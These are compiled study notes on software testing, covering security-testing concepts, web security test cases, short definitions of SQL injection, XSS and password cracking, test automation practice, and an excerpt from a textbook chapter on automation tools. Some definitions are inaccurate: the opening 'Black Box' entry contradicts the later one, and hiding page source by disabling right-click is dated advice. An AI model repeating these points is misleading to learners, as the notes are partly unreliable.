• Tiger Box:This hacking is usually done on a laptop which has a collection of OSs and hacking tools. This testing helps penetration testers and security testers to conduct vulnerabilities assessment and attacks.

• Black Box:Tester is authorized to do testing on everything about the network topology and the technology.

• Grey Box: Partial information is given to the tester about the system, and it is hybrid of white and black box models.

Roles you must know!

• Hackers - Access computer system or network without authorization • Crackers - Break into the systems to steal or destroy data • Ethical Hacker - Performs most of the breaking activities but with permission from

owner • Script Kiddies or packet monkeys - Inexperienced Hackers with programming

language skill

When do we use Security Testing? Security testing is carried out when some important information and assets managed by the software application are of significant importance to the organization. Failures in the

http://www.guru99.com/sap-fico-training-tutorials.html

software security system can be serious especially when not detected, thereby resulting in a loss or compromise of information without the knowledge of that loss. The security testing should be performed both prior to the system going into the operation and after the system is put into operation. Rigorous security testing activities are performed to demonstrate that the system meets the specified security requirements & identify the left out security vulnerabilities, if any. The extent of testing largely depends upon the security risks, and the test engineers assigned to conduct the security testing are selected according to the estimated sophistication that might be used to penetrate the security. What are the objectives of Security Testing? Security defects do not come to surface that easily as other types of defects. Thus security testing is carried out to identify defects that are quite difficult to identify. The security testing is carried out to ensure that the software under test is sufficiently robust and functions in an acceptable manner even in the event of a malicious attack. The objectives of security testing can be: 1) To ensure that adequate attention is provided to identify the security risks 2) To ensure that a realistic mechanism to define & enforce access to the system is in place 3) To ensure that sufficient expertise exists to perform adequate security testing 4) To conduct reasonable tests to confirm the proper functioning of the implemented security measures Who should do the Security Testing? Majority of the security testing techniques are manual, requiring an individual to initiate and conduct the test. Automation tools can be helpful in executing simple tasks, whereas complicated tasks continue to depend largely on the intelligentsia of the test engineer. Irrespective of the type of testing, the testing engineers that plan and conduct security testing should have significant security and networking related knowledge, including expertise of following areas: 1) Network security 2) Firewalls 3) Intrusion detection system 4) Operating systems 5) Programming and networking protocols like TCP/IP

Security Testing versus Conventional Software Testing Security testing has following attributes:

• It emphasizes what an application should not do rather than what it should do. • It sometimes tests conformance to positive requirements for instance - "User

accounts getting disabled after five unsuccessful login attempts" etc. • It is aimed to test the negative requirements stating something that should never

occur. For example "An external attacker should not be able to modify the

contents of the Web page" and "Unauthorized users should not be able to access the data."

Methods of Security Testing: To confirm if a particular software application meets the security requirements, usually following two methods of testing are adopted 1) Functional security testing: It is meant to ensure that the software behaves according to certain specified functional requirements and is expected to demonstrate that the specified requirements are totally satisfied at the acceptable level. Functional requirement generally have a form like - "When a certain thing takes place, then the software must respond in a particular way." 2) Risk-based security testing: The first step in risk-based testing is the identification of the security risks and the potential loss associated with those risks. It tries to confirm the immunity against specific risks that have been identified through risk analysis effort. Risk-based testing addresses negative requirements, which state what a software system should not do. Tests for negative requirements are derived from a risk analysis, and generally cover not only the high-level risks identified during the design process but also address low-level risks derived from the software itself.

Test Cases for Security Testing:

1. Try to directly access bookmarked web page without login to the system.

2. Verify that system should restrict you to download the file without sign in on the system.

3. Verify that previous accessed pages should not accessible after log out i.e. Sign out and then press the Back button to access the page accessed before.

4. Check the valid and invalid passwords, password rules say cannot be less than 6 characters, user id and password cannot be the same etc.

5. Verified that important i.e. sensitive information such as passwords, ID numbers, credit card numbers, etc should not get displayed in the input box when typing. They should be encrypted and in asterix format.

6 .Check Is bookmarking disabled on secure pages? Bookmarking Should be disabled on secure pages.

7. Check Is Right Click, View, Source disabled? Source code should not be visible to user.

8. Is there an alternative way to access secure pages for browsers under version 3.0, since SSL is not compatible with those browsers?

9. Check does your server lock out an individual who has tried to access your site multiple times with invalid login/password information?

10. Verify the timeout condition, after timeout user should not able to navigate through the site.

11. Check Are you prevented from doing direct searches by editing content in the URL?

12. Verify that relevant information should be written to the log files and that information should be traceable.

13. In SSL verify that the encryption is done correctly and check the integrity of the information.

14. Verify that restricted page should not be accessible by user after session time out.

15. ID / password authentication, the same account on different machines cannot log on at the same time. So at a time only one user can login to the system with a user id.

16. ID / password authentication methods entered the wrong password several times and check if the account gets locked.

17. Add or modify important information (passwords, ID numbers, credit card number, etc.). Check if it gets reflected immediately or caching the old values.

18. Verify that Error Message does not contain malicious info so that hacker will use this information to hack web site.

Some key terms used in security testing

Before we go further, it will be useful to be aware of a few terms that are frequently used in web application security testing:

What is “Vulnerability”? This is a weakness in the web application. The cause of such a “weakness” can be bugs in the application, an injection (SQL/ script code) or the presence of viruses. What is “URL manipulation”? Some web applications communicate additional information between the client (browser) and the server in the URL. Changing some information in the URL may sometimes lead to unintended behavior by the server.

What is “SQL injection”? This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server.

What is “XSS (Cross Site Scripting)”? When a user inserts HTML/ client-side script in the user interface of a web application and this insertion is visible to other users, it is called XSS.

What is “Spoofing”? The creation of hoax look-alike websites or emails is called spoofing.

Security testing approach:

In order to perform a useful security test of a web application, the security tester should have good knowledge of the HTTP protocol. It is important to have an understanding of how the client (browser) and the server communicate using HTTP. Additionally, the tester should at least know the basics of SQL injection and XSS. Hopefully, the number of security defects present in the web application will not be high. However, being able to accurately describe the security defects with all the required details to all concerned will definitely help.

Types of testing to perform while Security Testing

Let’s discuss what all steps to prepare while preparing and planning for Security testing:

• The first step is to understand the business requirement, security goals and objective in terms of security compliance of the organization. The test planning should consider all security factors like Organization might have planned to achieve PCI compliance etc.

• Understand and analyze the requirements of the application under test. • Collect all system setup information used for development of Software and

Network like Operating Systems, technology, hardware. • Make out the list of Vulnerabilities and Security Risks. • Based on above step prepare Threat profile. • Based on identified Threat, Vulnerabilities and Security Risks prepare test plan to

address these issues. • For each identified Threat, Vulnerabilities and Security Risks prepare Traceability

Matrix. • All security testing cannot possible to execute manually, so identify the tool to

execute the all security test cases faster & more reliable. • Prepare the Security tests case document. • Perform the Security Test cases execution and retest the defect fixes. • Execute the Regression Test cases.

• Prepare detailed report of Security Testing which contains Vulnerabilities and Threats contained, detailing risks, and still open issues etc.

6 basics terms used in Security Testing

Here are the useful terms frequently used in severity testing:

1) What is “Penetration Testing”?

Penetration testing is a type of security testing process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. The main purpose of this testing is to protect the identified vulnerabilities & secure the important data from unknown user who do not have the access to the system like hackers. The penetration testing can be carried out after the cautious consideration, notification, and planning.

There are two types of penetration testing, White box testing & Black box testing. In White box testing is all information is with tester prior start testing like IP Address, Code & Infrastructure diagram & based on available information tester will perform the testing. In Black box testing, tester do not has any information of system under test. This is more accurate testing method as we are simulating the testing with real hackers which they do not having the information of existing system.

2) Password cracking:

In security testing of a web application Password cracking programs can be used to identify weak passwords. It can be start using guessing the common username and password or use of password cracking tool. Password cracking confirms that users are making use of adequately strong passwords.

In the system password are generally stored in the encrypted format like hash, so once the use try to login using login credentials then hash is created for newly entered password & compared with the original stored hash, once the stored hash matches then user is authenticated. Automated Password cracking is basically generates the random hashes unless and until match is not found. The most commonly used password cracking is the use of Dictionary attack. In this case automated tool is try all words from dictionary.

It would be easier if the password does not asking for complex passwords like password must having at least one digit one character and one special characters etc. Sometimes the passwords are stored on cookies, if such login credentials information stored without

encryption in cookies then hacker can use different methods to get the username & password information.

3) What is “Vulnerability”?

The Vulnerability is a weakness in a system under test which may cause the malicious attaches by unauthorized users. The vulnerability can be increase due to bugs in the software, lacking of Security testing or viruses etc. These security vulnerabilities require patches, or fixes, in order to prevent the potential for compromised integrity by hackers or malware.

4) What is “URL manipulation”?

URL Manipulation is very much interesting and most common type of attack by hackers. In this attack the hackers manipulate the website URL query strings & capture the important information.

This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the query string. The tester can modify a parameter value in the query string to check if the server accepts it.

Via HTTP GET request user information is passed to server for authentication or fetching data. Attacker can manipulate every input variable passed from this GET request to server in order to get the required information or to corrupt the data. In such conditions any unusual behavior by application or web server is the doorway for the attacker to get into the application.

So while security testing the URL manipulation test cases should be considered to make sure that using URL manipulation unauthorized user is not able to access the important information or not corrupting the database records.

5) What is “SQL injection”?

SQL Injection is one of the most common application layer attack techniques used by hackers. SQL Injection is one of the several web attack mechanisms used by hackers to steal data from organizations. SQL injection attacks are very critical as attacker can get vital information from server database. It is a type of attack which takes the advantage of loop holes present in implementation of web application that allows hacker to hack the system like passing sql queries into all input fields and tries to hack the system.

Hackers try to query database with SQL injection statements or part of SQL statement as user input & pull out the vital information from system or crash the system & from the error displayed on browser can get the required information what they are looking for.

To check the sql injection we have to take care of the input fields like text boxes, comments etc. The Special characters should be either properly handled or skipped from the input.

6) Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS or CSS) is a type of computer security vulnerability typically found in web applications. Cross Site Scripting is one of the most common application layer hacking techniques. Cross Site Scripting is vulnerability in web application that allows an attacker to inject HTML and JAVASCRIPT code into a web page. This type of attacks are injecting malicious scripts into victim’ web browsers. These malicious scripts are used to steal the vital information stored in the cookies.

Test automation

What is Automation Testing

Using Automation tools to write and execute test cases is known as automation testing. No manual intervention is required while executing an automated test suite.

Testers write test scripts and test cases using the automation tool and then group into test suites.

Benefits of Automation Testing

• Reduction of repetitive work. • Repeatability • Greater consistency • Ease of access of information about tests or testing

Automation testing

Automation testing which is also known as Test Automation, is when the tester writes scripts and uses another software to test the software. This process involves automation of a manual process. Automation Testing is used to re-run the test scenarios that were performed manually, quickly and repeatedly.

Apart from regression testing, Automation testing is also used to test the application from load, performance and stress point of view. It increases the test coverage; improve accuracy, saves time and money in comparison to manual testing.

http://www.softwaretestingmentor.com/automation/introduction-to-automation/

What to automate?

It is not possible to automate everything in the Software; however the areas at which user can make transactions such as login form or registration forms etc, any area where large amount of users. can access the Software simultaneously should be automated.

Furthermore all GUI items, connections with databases, field validations etc can be efficiently tested by automating the manual process.

When to automate?

Test Automation should be uses by considering the following for the Software:

• Large and critical projects. • Projects that require testing the same areas frequently. • Requirements not changing frequently. • Accessing the application for load and performance with many virtual users. • Stable Software with respect to manual testing. • Availability of time.

How to automate?

Automation is done by using a supportive computer language like vb scripting and an automated software application. There are a lot of tools available which can be use to write automation scripts. Before mentioning the tools lets identify the process which can be used to automate the testing:

• Identifying areas within a software for automation. • Selection of appropriate tool for Test automation. • Writing Test scripts. • Development of Test suits. • Execution of scripts. • Create result reports. • Identify any potential bug or performance issue.

In software testing, test automation is the use of special software (separate from the software being tested) to control the execution of tests and the comparison of actual outcomes with predicted outcomes. Test automation can automate some repetitive but necessary tasks in a formalized testing process already in place, or add additional testing that would be difficult to perform manually.

There are many approaches to test automation, however below are the general approaches used widely:



• Code-driven testing. The public (usually) interfaces to classes, modules or libraries are tested with a variety of input arguments to validate that the results that are returned are correct.

• Graphical user interface testing. A testing framework generates user interface events such as keystrokes and mouse clicks, and observes the changes that result in the user interface, to validate that the observable behavior of the program is correct.

• API driven testing. A testing framework that uses programming interface of the application to validate, the behaviour under test. Typically API driven testing bypasses application user interface altogether.

Code-driven testing

A growing trend in software development is the use of testing frameworks such as the xUnit frameworks (for example, JUnit and NUnit) that allow the execution of unit tests to determine whether various sections of the code are acting as expected under various circumstances. Test cases describe tests that need to be run on the program to verify that the program runs as expected.

Code driven test automation is a key feature of agile software development, where it is known as test-driven development (TDD). Unit tests are written to define the functionality before the code is written. However, these unit tests evolve and are extended as coding progresses, issues are discovered and the code is subjected to refactoring . Only when all the tests for all the demanded features pass is the code considered complete. Proponents argue that it produces software that is both more reliable and less costly than code that is tested by manual exploration.[citation needed] It is considered more reliable because the code coverage is better, and because it is run constantly during development rather than once at the end of a waterfall development cycle. The developer discovers defects immediately upon making a change, when it is least expensive to fix. Finally, code refactoring is safer; transforming the code into a simpler form with less code duplication, but equivalent behavior, is much less likely to introduce new defects.

Graphical User Interface (GUI) testing

Many test automation tools provide record and playback features that allow users to interactively record user actions and replay them back any number of times, comparing actual results to those expected. The advantage of this approach is that it requires little or no software development. This approach can be applied to any application that has a graphical user interface. However, reliance on these features poses major reliability and maintainability problems. Relabelling a button or moving it to another part of the window may require the test to be re-recorded. Record and playback also often adds irrelevant activities or incorrectly records some activities.

A variation on this type of tool is for testing of web sites. Here, the "interface" is the web page. This type of tool also requires little or no software development. However, such a

http://en.wikipedia.org/wiki/Public_interface

http://en.wikipedia.org/wiki/Graphical_user_interface

http://en.wikipedia.org/wiki/XUnit

http://en.wikipedia.org/wiki/JUnit

http://en.wikipedia.org/wiki/NUnit

http://en.wikipedia.org/wiki/Unit_test

http://en.wikipedia.org/wiki/Code

http://en.wikipedia.org/wiki/Test_case

http://en.wikipedia.org/wiki/Agile_software_development

http://en.wikipedia.org/wiki/Test-driven_development

http://en.wikipedia.org/wiki/Wikipedia:Citation_needed

http://en.wikipedia.org/wiki/Waterfall_model

http://en.wikipedia.org/wiki/Code_refactoring

http://en.wikipedia.org/wiki/Software_development

http://en.wikipedia.org/wiki/Graphical_user_interface

framework utilizes entirely different techniques because it is reading HTML instead of observing window events.

Another variation is scriptless test automation that does not use record and playback, but instead builds a model of the Application Under Test (AUT) and then enables the tester to create test cases by simply editing in test parameters and conditions. This requires no scripting skills, but has all the power and flexibility of a scripted approach. Test-case maintenance seems to be easy, as there is no code to maintain and as the AUT changes the software objects can simply be re-learned or added. It can be applied to any GUI-based software application.The problem is the model of the AUT is actually implemented using test scripts, which have to be constantly maintained whenever there's change to the AUT.

API driven testing

API driven testing is also being widely used by software testers as it's becoming tricky to create and maintain GUI-based automation testing.

Programmers or testers write scripts using a programming or scripting language that calls interface exposed by the application under test. These interfaces are custom built or commonly available interfaces like COM, HTTP, command line interface. The test scripts created are executed using an automation framework or a programming language to compare test results with expected behaviour of the application.

Test automation interface

Test automation interface are platforms that provide a single workspace for incorporating multiple testing tools and frameworks for System/Integration testing of application under test. The goal of Test Automation Interface is to simplify the process of mapping tests to business criteria without coding coming in the way of the process. Test automation interface are expected to improve the efficiency and flexibility of maintaining test scripts.

Test Automation Interface Model

Test Automation Interface consists of the following core modules:

• Interface Engine • Interface Environment • Object Repository

Interface engine

Interface engines are built on top of Interface Environment. Interface engine consists of a parser and a test runner. The parser is present to parse the object files coming from

http://en.wikipedia.org/wiki/HTML

http://en.wikipedia.org/wiki/Test_script

http://en.wikipedia.org/wiki/Workspace

http://en.wikipedia.org/wiki/System_testing

http://en.wikipedia.org/wiki/Parser

the object repository into the test specific scripting language. The test runner executes the test scripts using a test harness.

Interface environment

Interface environment consists of Product/Project Library and Framework Library. Framework Library have modules related with the overall test suite while the Product/Project Library have modules specific to the application under test.

Object repository

Object repositories are a collection of UI/Application object data recorded by the testing tool while exploring the application under test.

Why automate Testing?

In today´s fast moving world, it is a challenge for any company to continuously maintain and improve the quality and efficiency of software systems development. In many software projects, testing is neglected because of time or cost constraints. This leads to a lack of product quality, followed by customer dissatisfaction and ultimately to increased overall quality costs.

The main reasons for these added costs are primarily poor test strategy, underestimated effort of test case generation, delay in testing, and subsequent test maintenance.

Test automation can improve the development process of a software product in many cases. The automation of tests is initially associated with increased effort, but the related benefits will quickly pay off.

Automated tests can run fast and frequently, which is cost-effective for software products with a long maintenance life. When testing in an agile environment, the ability to quickly react to ever-changing software systems and requirements is necessary. New test cases are generated continuously and can be added to existing automation in parallel to the development of the software itself.

In both manual and automated testing environments test cases need to be modified for extended periods of time as the software project progresses. It is important to be aware that complete coverage of all tests using test automation is unrealistic. When deciding what tests to automate first, their value vs. the effort to create them needs to be considered. Test cases with high value and low effort should be automated first. Subsequently test cases with frequent use, changes, and past errors; as well as test cases with low to moderate effort in setting up the test environment and developing the automation project are best suited for automation.

Automated testing is important due to following reasons:

http://en.wikipedia.org/wiki/Test_harness

• Manual Testing of all work flows, all fields , all negative scenarios is time and cost consuming

• It is difficult to test for multi lingual sites manually • Automation does not require Human intervention. You can run automated test

unattended (overnight) • Automation increases speed of test execution • Automation helps increase Test Coverage • Manual Testing can become boring and hence error prone.

Which Test Cases to Automate?

Test cases to be automated can be selected using the following criterion to increase the automation ROI

• High Risk - Business Critical test cases • Test cases that are executed repeatedly • Test Cases that are very tedious or difficult to perform manually • Test Cases which are time consuming

The following category of test cases are not suitable for automation:

• Test Cases that are newly designed and not executed manually atleast once • Test Cases for which the requirements are changing frequently • Test cases which are executed on ad-hoc basis.

Test automation allows performing different types of testing efficiently and effectively.

Poor-quality software applications increase costs, impact revenue and negatively affect reputation.

Organizations must optimize the quality of increasingly complex software applications more quickly and cost-effectively than ever before to deliver the winning solutions that yield a high ROI and drive competitive advantage.

While testing does not guarantee quality it is a crucial part of the lifecycle quality process. Software test automation can reduce redundant, manual testing while maximizing repeatability and test accuracy to improve the breadth of testing. And while test automation already provides many benefits in traditional development environments, agile development methodologies make the use of test automation essential.

Advantages of test automation

Automated testing delivers the following long-term advantages:

• Reusability – Test automation does not require users to start from scratch with each new testing effort. Reusable tests will run more frequently, enabling personnel to find and fix more errors earlier in the development process and build libraries of repeatable test assets – in effect, transforming each test into intellectual property with long-term value.

• Predictability and consistency – QA using test automation can rerun a test with the utmost consistency, critical when development team[s?] create a new build. Regression tests quickly verify whether pre-existing functionality still works in the new version and provide early development feedback. The testing process itself also benefits from consistency: a repeatable process for documenting test results enables QA to reproduce and verify errors – accelerating the resolution process.

• Productivity – Automated testing creates a high productivity environment for organizations without requiring additional resources. For example, QA organizations can run unattended tests, 24/7, across multiple platforms, browsers and environments simultaneously, allowing personnel to concentrate on other quality issues. The resulting productivity gains have the dual effect of shortening test cycles and increasing opportunities to optimize software quality.

• Efficiency – Delivering easy-to-use test automation software that is accessible to users with differing levels of technical expertise enables different user roles to effectively contribute to testing in a coherent, managed, collaborative environment

Automation Process

Following steps are followed in an Automation Process

Test tool selection

Test Tool selection largely depends on the technology the Application Under Test is built on. For instance QTP does not support Informatica. So QTP cannot be used for testing Informatica applications. It's a good idea to conduct Proof of Concept of Tool on AUT

Define the scope of Automation

Scope of automation is the area of your Application Under Test which will be automated. Following points help determine scope:

• Feature that are important for the business • Scenarios which have large amount of data • Common functionalities across applications • Technical feasibility • Extent to which business components are reused • Complexity of test cases • Ability to use the same test cases for cross browser testing

Planning, Design and Development

During this phase you create Automation strategy & plan, which contains following details-

• Automation tools selected • Framework design and its features • In-Scope and Out-of-scope items of automation • Automation test bed preparation • Schedule and Timeline of scripting and execution • Deliverables of automation testing

Test Execution

Automation Scripts are executed during this phase. The scripts need input test data before there are set to run. Once executed they provide detailed test reports.

Execution can be performed using the automation tool directly or through the Test Management tool which will invoke the automation tool.

http://www.guru99.com/quick-test-professional-qtp-tutorial.html

http://www.guru99.com/quick-test-professional-qtp-tutorial-34.html




Example: Quality center is the Test Management tool which in turn it will invoke QTP for execution of automation scripts. Scripts can be executed in a single machine or a group of machines. The execution can be done during night , to save time.

Maintenance

As new functionalities are added to the System Under Test with successive cycles, Automation Scripts need to be added, reviewed and maintained for each release cycle. Maintenance becomes necessary to improve effectiveness of Automation Scripts.

Benefits of automated testing

Following are benefits of automated testing:

• 70% faster than the manual testing • Wider test coverage of application features • Reliable in results • Ensure Consistency • Saves Time and Cost • Improves accuracy • Human Intervention is not required while execution • Increases Efficiency • Better speed in executing tests • Re-usable test scripts • Test Frequently and thoroughly • More cycle of execution can be achieved through automation • Early time to market

phases involved in Test Automation Life Cycle

Following are the phases involved in Test Automation Life Cycle. This can be varied from organization to organization or project to project.

1. Automation Feasibility Analysis 2. Test Strategy 3. Environment Set up 4. Test Script Development 5. Test Script Execution 6. Test Result Generation and Analysis

Below is the snapshot of Test Automation Life Cycle.

Fig: Test Automation Life Cycle

1. Automation Feasibility Analysis

Before kicking off implementing test automation, it is mandatory to analyze the feasibility of the application under test (AUT). Whether AUT is a right candidate or not for the test automation?

Also, feasibility analysis should be done on the manual test case pack which enables automation engineers to design the test scripts.

Apart from above feasibility, tool check can be done if your client insists to use their recommended tool selection.

Following are the feasibility check to be done to begin test automation:

• AUT automation feasibility • Test Case automation feasibility • Tool feasibility

2. Test Strategy

Test Strategy is the most critical phase in test automation. This phase defines how to approach and accomplish the mission. First and foremost in test strategy is selection of test automation framework.

Following are the types of test automation framework:

http://qainsights.com/wp-content/uploads/2012/11/Test-Automation-Life-Cycle-qainsights.png

1. Record and Playback Framework 2. Functional Decomposition Framework 3. Keyword/Table Driven Framework 4. Data Driven Framework 5. Hybrid Framework 6. Business Process Framework

Most of the projects prefer Hybrid framework which is the combination of Keyword driven and Data driven framework. Because it has high reusability, more robust and pros when compared with other kinds of frameworks.

Other factors which involves in test strategy as follows

1. Schedule 2. Number of resources 3. defining SLA 4. Mode of communication process 5. Defining in-scope and out-of-scope 6. Return on Investment analysis

3. Environment Set up

It is ideal to execute test automation scripts in regression environment. Test environment set up phase has following tasks:

1. Sufficient tool licenses 2. Sufficient add-ins licenses 3. Sufficient utilities like comparison tools, advance text editors etc. 4. Implementation of automation framework 5. AUT access and valid credentials

4. Test Script Development

This phase is the inception of implementing test automation. Activities of Automation test engineers as follows:

1. Object Identification 2. Creating Function Libraries 3. Building the scripts 4. Unit testing the scripts 5. Warm-up test execution

5. Test Script Execution

Unit tested and signed-off Test scripts will be delivered to automation testing team for script execution. Following are the tasks involved with test script execution team.

1. Test script execution 2. Updating the execution or coverage tracker 3. Defect Logging

6. Test Result Generation and Analysis

Result generation and analysis is the last phase and important deliverables in test automation. Results must be baselined and signed-off. Following are the important activities in this phase:

1. Result analysis 2. Report generation 3. Documenting the issues and knowledge gained 4. Preparation of client presentation

Manual testing is performed by a human sitting in front of a computer carefully executing the test steps. Automation Testing means using an automation tool to execute your test case suite. The automation software can also enter test data into the System Under Test , compare expected and actual results and generate detailed test reports.

Test Automation demands considerable investments of money and resources. Successive development cycles will require execution of same test suite repeatedly. Using a test automation tool it's possible to record this test suite and re-play it as required. Once the test suite is automated, no human intervention is required . This improved ROI of Test Automation.

Goal of Automation is to reduce number of test cases to be run manually and not eliminate manual testing all together.

Framework in Automation

A framework is set of automation guidelines which help in

• Maintaining consistency of Testing • Improves test structuring • Minimum usage of code • Less Maintenance of code • Improve re-usability • Non Technical testers can be involved in code • Training period of using the tool can be reduced • Involves Data wherever appropriate

There are four types of framework used in software automation testing:

1. Data Driven Automation Framework 2. Keyword Driven Automation Framework 3. Modular Automation Framework 4. Hybrid Automation Framework

Benefits

To many people, the benefits of automation are pretty obvious. Tests can be run faster, they're consistent, and tests can be run over and over again with less overhead. As more automated tests are added to the test suite more tests can be run each time thereafter. Manual testing never goes away, but these efforts can now be focused on more rigorous tests.

There are some common 'perceived' benefits that I like to call 'bogus' benefits. Since test automation is an investment it is rare that the testing effort will take less time or resources in the current release. Sometimes there's the perception that automation is easier than testing manually. It actually makes the effort more complex since there's now another added software development effort. Automated testing does not replace good test planning, writing of test cases or much of the manual testing effort.

Costs

Costs of test automation include personnel to support test automation for the long term. As mentioned, there should be a dedicated test environment as well as the costs for the purchase, development and maintenance of tools. All of the efforts to support software development, such as planning, designing, configuration management, etc. apply to test automation as well.

Optimization of Speed, Efficiency, Quality and the Decrease of Costs

The main goal in software development processes is a timely release. Automated tests run fast and frequently, due to reused modules within different tests. Automated regression tests which ensure the continuous system stability and functionality after changes to the software were made lead to shorter development cycles combined with better quality software and thus the benefits of automated testing quickly outgain the initial costs.

Advance a Tester´s Motivation and Efficiency

Manual testing can be mundane, error-prone and therefore become exasperating. Test automation alleviates testers' frustrations and allows the test execution without user interaction while guaranteeing repeatability and accuracy. Instead testers can now concentrate on more difficult test scenarios.

Increase of Test Coverage

Sufficient test coverage of software projects is often achieved only with great effort. Frequent repetition of the same or similar test cases is laborious and time consuming to perform manually. Some examples are:

• Regression test after debugging or further development of software • Testing of software on different platforms or with different configurations • Data-driven testing (creation of tests using the same actions but with many

different inputs)

Automate to increase efficiencies

Test automation can accelerate the testing cycle and promote software quality. Automating regression tests and other repetitive tasks releases QA personnel to expand their quality efforts. That means they can increase test coverage by extending automation to parts of the application that may not have been thoroughly tested in prior releases. The use of data-driven automation approaches and frameworks further increases testing efficiency and can underpin effective configuration testing.

12.10 SYSTEM TEST AUTOMATION

It is absolutely necessary for any testing organization to move forward to becomemore efficient, in particular in the direction of test automation. The reasons forautomating test cases are given in Table 12.13. It is important to think aboutautomation as a strategic business activity. A strategic activity requires senior man-agement support; otherwise it will most likely fail due to lack of funding. It shouldbe aligned with the business mission and goals and a desire to speed up delivery ofthe system to the market without compromising quality. However, automation is along-term investment; it is an on-going process. It cannot be achieved overnight;expectation need to be managed to ensure that it is realistically achievable withina certain time period.

TABLE 12.13 Benefits of Automated Testing

1. Test engineer productivity

2. Coverage of regression testing

3. Reusability of test cases

4. Consistency in testing

5. Test interval reduction

6. Reduced software maintenance cost

7. Increased test effectiveness

392 CHAPTER 12 SYSTEM TEST PLANNING AND AUTOMATION

The organization must assess and address a number of considerations beforetest automation can proceed. The following prerequisites need to be considered foran assessment of whether or not the organization is ready for test automation:

• The system is stable and its functionalities are well defined.

• The test cases to be automated are unambiguous.

• The test tools and infrastructure are in place.

• The test automation professionals have prior successful experience withautomation.

• Adequate budget has been allocated for the procurement of software tools.

The system must be stable enough for automation to be meaningful. If thesystem is constantly changing or frequently crashing, the maintenance cost of theautomated test suite will be rather high to keep the test cases up to date with thesystem. Test automation will not succeed unless detailed test procedures are inplace. It is very difficult to automate a test case which is not well defined to bemanually executed. If the tests are executed in an ad hoc manner without developingthe test objectives, detailed test procedure, and pass–fail criteria, then they are notready for automation. If the test cases are designed as discussed in Chapter 11,then automation is likely to be more successful.

The test engineers should have significant programming experience. It is notpossible to automate tests without using programming languages, such as Tcl (Toolcommand language), C, Perl, Python, Java, and Expect. It takes months to learn aprogramming language. The development of an automation process will fail if thetesters do not have the necessary programming skills or are reluctant to develop it.Adding temporary contractors to the test team in order to automate test cases maynot work. The contractors may assist in developing test libraries but will not beable to maintain an automated test suite on an on-going basis.

Adequate budget should be available to purchase and maintain new softwareand hardware tools to be used in test automation. The organization should keepaside funds to train the staff with new software and hardware tools. Skilled profes-sionals with good automation background may need to be added to the test teamin order to carry out the test automation project. Therefore, additional head countshould be budgeted by the senior executive of the organization.

12.11 EVALUATION AND SELECTION OF TESTAUTOMATION TOOLS

A test automation tool is a software application that assists in the automation oftest cases that would otherwise be run manually. Some tools are commerciallyavailable in the market, but for testing complex, imbedded, real-time systems, veryfew commercial test tools are available in the market. Therefore, most organizationsbuild their own test automation frameworks using programming languages such asC and Tcl. It is essential to combine both hardware and software for real-time testing

12.11 EVALUATION AND SELECTION OF TEST AUTOMATION TOOLS 393

tools. This is due to the fact that special kinds of interface cards are required to beconnected to the SUT. The computing power of personal computers with networkinterface cards may not be good enough to send traffic to the SUT.

Test professionals generally build their own test tools in high-technologyfields, such as telecommunication equipment and application based on IP. Com-mercial third-party test tools are usually not available during the system testingphase. For example, there were no commercially available test tools during thetesting of the 1xEv-DO system described in Chapter 8. The second author of thisbook developed in-house software tools to simulate access terminals using their ownproducts. However, we advocate that testers should build their own test automa-tion tools only if they have no alternative. Building and maintaining one’s own testautomation tool from scratch are time-consuming tasks and an expensive under-taking. The test tool evaluation criteria are formulated for the selection of the rightkind of software tool. There may be no tool that fulfills all the criteria. Therefore,we should be a bit flexible during the evaluation of off-the-self automation toolsavailable in the market. The broad criteria for evaluating test automation tools havebeen classified into the following eight categories as shown in Figure 12.3.

1. Test Development Criteria: An automation test tool should provide ahigh-level, preferably nonproprietary, easy-to-use test scripting language such asTcl. It should have the ability to interface and drive modules that can be easilywritten in, for example, C, Tcl, Perl, or Visual Basic. The tool must providefacility to directly access, read, modify, and control the internals of the automatedtest scripts. The input test data should be stored separately from the test scriptbut easily cross-referenced to the corresponding test scripts, if necessary. Thetool should have built-in templates of test scripts, test cases, tutorials, and demoapplication examples to show how to develop automated test cases. Finally,no changes should be made to the SUT in order to use the tool. The vendor’s

Test development

Test maintenance

Test execution

Test results

Test management

GUI Testingcapability

VendorQualification

Pricing

Toolevaluation

criteria

Figure 12.3 Broad criteria of test automation tool evaluation.


recommended environment should match the real test laboratory executionenvironment.

2. Test Maintenance Criteria: The tool should possess a rich set of features,such as version control capability on test cases, test data, and migration of test casesacross different platforms. The tool must provide powerful, easy-to-use facilitiesto browse, navigate, modify, and reuse the test suites. The tool should have theability to select a subset of test cases to form a group for a particular test runbased on one or more distinguishing characteristics. A tool needs to have featuresto allow modification and replication of test cases, easy addition of new test cases,and import from another. The tool should have the capability to add multiple tagsto a test case and modify those tags so that the test case can be easily selected ina subgroup of test cases sharing a common characteristic.

3. Test Execution Criteria: An automation tool should allow test cases to beexecuted individually, as a group, or in a predefined sequence. The user should havethe ability to check the interim results during the execution of a group of tests andexercise other options for the remainder of the tests based on the interim results.The user should have the option to pause and resume the execution of a test suite.The tool should have the facility to execute the test suite over the Internet. The toolshould allow simultaneous execution of several test suites that can be distributedacross multiple machines for parallel execution. This substantially reduces the timeneeded for testing if multiple test machines are available. The test tool should havea capability for monitoring, measuring, and diagnosing performance characteristicsof the SUT. Finally, the tool should have the capability to be integrated with othersoftware tools which are either in use or expected to be used.

4. Test Results Criteria: The test tool must provide a flexible, comprehensivelogging process during execution of the test suite, which may include detailedrecords of each test case, test results, time and date, and pertinent diagnostic data.A tool should have the capability to cross-reference the test results back to the rightversions of test cases. The test result log can be archived in an industry standarddata format and the tool should have an effective way to access and browse thearchived test results. The tool should provide query capability to extract test results,analyze the test status and trend, and produce graphical reports of the test results.Finally, the tool should have the capability to collect and analyze response timeand throughput as an aid to performance testing.

5. Test Management Criteria: A tool should have the ability to provide a teststructure, or hierarchy, that allows test cases to be stored and retrieved in a mannerthat the test organization wants to organize. The tool should have the capabilityto allocate tests or groups of tests to specific test engineers and compare the workstatus with the plan through graphic display. A tool needs to have authorizationfeatures. For example, a test script developer may be authorized to create andupdate the test scripts, while the test executer can only access them in the runmode. The tool should have the capability to send out emails with the test resultsafter completion of test suite execution.

12.12 TEST SELECTION GUIDELINES FOR AUTOMATION 395

